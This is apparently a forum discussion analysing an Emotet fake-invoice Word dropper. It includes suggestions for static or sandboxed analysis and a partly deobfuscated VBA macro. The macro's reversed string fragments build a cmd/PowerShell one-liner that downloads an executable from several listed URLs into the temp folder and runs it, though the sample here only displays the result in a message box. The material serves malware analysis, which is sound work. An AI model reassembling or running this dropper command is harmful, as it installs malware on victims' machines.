Argthtjtr

This pastebin hosts current URLs hosting the fake invoice of Emotet malware, which is the dropper part of the malware.

The document is a Office Open XML, and there are two large non textual segments in it.

I can't make any sense of the other segment.

One of them is this:

I assume the other one contains at least some VB script and something else, but it decodes (assuming base64 like the jpg part) to nothing that file recognizes.

Without reviewing the file itself, other than a VB script used as a macro, the second part is more likely an obfuscated/encrypted executable file of some sort.

However since it's evident macros are used, the executable file (either a PE or a script) is probably at least somewhat obfuscated and will only be decoded/decrypted before being it's dropped to disk or something similar.

Statically, your safest bet would be extracting the macro (that isn't hard, macros are pretty noticeable as far as the standard is concerned) and reversing the decoding/deobfuscating method used.

An easier approach would be to let the document drop the executable by opening it and letting the macros run inside a VM, optionally using something like process explorer/api monitor to catch the dropped file.

the vba appears to be some thing like this
the functions appears to be useless the zillnp appears to take this string

you can copy paste the strings and concatentate it

Sub foo()

zwrqd = "c:on" + "jzi" + "oi" + "izwolr" + "poic" + "wo" + ".." + ".."

szrtncm = "..win" + "dow" + "ssys" + "tem32" + "cmd." + "exe /c" + " %Pro" + "gram"

uvkplhz = "Data" + ":~0,1" + "%%Pro" + "gra" + "mData:" + "~9," + "2% /" + "V:ON/" + "C" + Chr(34) + "set"

oujod = " SiQ=;" + "'cjq" + "hpb'=" + "qijm" + "nd$}}" + "{hct" + "ac}};"

kbuitlk = "kaerb" + ";'bchk" + "zfb'=" + "dqk" + "zr$" + ";hkjzj" + "lz$ me" + "tI-e" + "kovnI{"

bjzzhsa = " )00" + "004 eg" + "- htg" + "nel.)h" + "kjzjlz" + "$ m" + "etI-t" + "eG((" + " fI;'"





hzipdp = "jrkj" + "ik'=ci" + "ikdj$" + ";)hkjz" + "jlz$" + " ,qjc" + "aki$(" + "eliFd" + "aoln"

wcwhr = "woD.ir" + "hwidj" + "${yrt" + "{)ujb" + "wa$ " + "ni qj" + "cak" + "i$(h"

rmflwpm = "caero" + "f;'" + "exe.'" + Chr(43) + "zbw" + "nifi$" + Chr(43) + "''" + Chr(43) + "pmet" + ":vne"

wuvcz = "$=hkj" + "zjlz" + "$;'ziw" + "mvv'=p" + "zrifo"

kqwok = "h$;'9" + "04' = " + "zbw" + "nifi$;" + "'sc" + "jmbw'" + "=fm" + "sqvii$" + ";)'@"

wzkwjw = "'(t" + "ilpS" + ".'41" + "fpege" + "LDa"

hrzqojk = "jCgKn" + "c/mo" + "c.sse" + "nisub" + "rusoh."

zpftzo = "www//:" + "ptth@" + "Mw6O6" + "3Df_" + "Cm066C" + "cdkU" + "7o/moc"



rnncbhd = ".ai" + "cizy" + "hp.ww" + "w//:pt" + "th@j" + "7OEo_7"

zihij = "MhAbZ" + "p6jnH" + "p/z" + "t.oc.s" + "keeg"

dwpit = "t.liam" + "//:" + "ptt" + "h@8or1" + "uzsd" + "Z8vi" + "e/RXI/" + "sed" + "ulcni-"

wccvfj = "pw/moc" + ".srev" + "ireht" + "ybkram" + "dnal//" + ":ptth" + "@R8Fd3"

zuvtjrq = "N9U" + "mbY" + "BzI/te" + "n.en" + "onil"

afactw = "etoh." + "www/" + "/:ptt" + "h'=ujb" + "wa$;" + "tnei"

worhm = "lCbeW." + "teN t" + "cejbo-" + "wen" + "=ir" + "hwidj$" + ";'imsi"

vaipzq = "zuu'=i" + "ijir" + "wb$ ll" + "%1,3-~" + ":PME" + "T%h%" + "1,4-" + "~:EMA" + "NNOI"

zcdjvo = "SSES%r" + "%1,5~" + ":CILB" + "UP%wo" + "p&&" + "for /"

vwqmd = "L %h i" + "n (65" + "7,-1" + ",0)" + "do s" + "et " + "nu=!"

tlpisj = "nu!!S" + "iQ:~" + "%h," + "1!&" + "&if %h" + " eq" + "u 0 e" + "cho !n"

nsfmr = "u:~-6" + "58!|" + " cmd" + Chr(34) + " "





uhdurz = zwrqd + szrtncm + uvkplhz + oujod + kbuitlk + bjzzhsa

jitovh = hzipdp + wcwhr + rmflwpm + wuvcz + kqwok + wzkwjw + hrzqojk + zpftzo

wwiqv = rnncbhd + zihij + dwpit + wccvfj + zuvtjrq + afactw + worhm + vaipzq + zcdjvo + vwqmd + tlpisj + nsfmr





MsgBox (uhdurz + jitovh + wwiqv)



End Sub